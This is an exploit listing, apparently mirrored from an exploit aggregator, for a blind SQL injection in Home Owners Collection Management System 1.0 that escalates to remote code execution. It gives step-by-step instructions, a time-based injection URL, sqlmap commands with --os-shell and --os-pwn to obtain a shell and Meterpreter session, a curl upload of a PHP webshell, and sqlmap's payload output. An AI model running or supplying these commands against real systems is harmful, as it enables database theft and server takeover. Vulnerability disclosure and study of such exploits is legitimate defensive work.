Exploit for Home Owners Collection Management System 1.0 SQL Injection

Name: Exploit for Home Owners Collection Management System 1.0 SQL Injection
Rating: 5 (207 reviews)

2022-03-21 | CVSS 0.3

## https://sploitus.com/exploit?id=PACKETSTORM:166378
# Exploit Title: Home Owners Collection Management System 1.0 - Remote Code Execution (Blind SQLi to RCE)  
# Date: 9/03/2022  
# Exploit Author: Hejap Zairy  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: XAMPP, Windows   
  
# Steps  
# 1.- Go to : http://192.168.56.1/cwms/?p=blogs/view_blog&id=3  
# 2 - manual inject Blind SQli http://192.168.56.1/cwms/?p=blogs/view_blog&id=3%27&&SLEEP(5)&&%271  
# 3 - SQLi To RCE r00t  
# 4 - Ubload webshell   
# 5 - Web Shell to meterpreter full tty shell  
  
  
  
# Blind sqli to Rce  
#Exploit   
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-shell --eta --hex --dbms=mysql --technique=b   
  
---  
Parameter: id (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: p=blogs/view_blog&id=3' AND 6447=6447-- hOiz  
---  
  
# ubload meterpreter metasploit   
sqlmap -u 'http://192.168.56.1/cwms/?p=blogs/view_blog&id=3' -p id --os-pwn --eta --hex --dbms=mysql --technique=b   
or  
curl -v -F "filename=@0day_hejap.php" http://192.168.56.1/tmpukpcj.php   
  
  
# Proof and Exploit:  
https://streamable.com/f07cug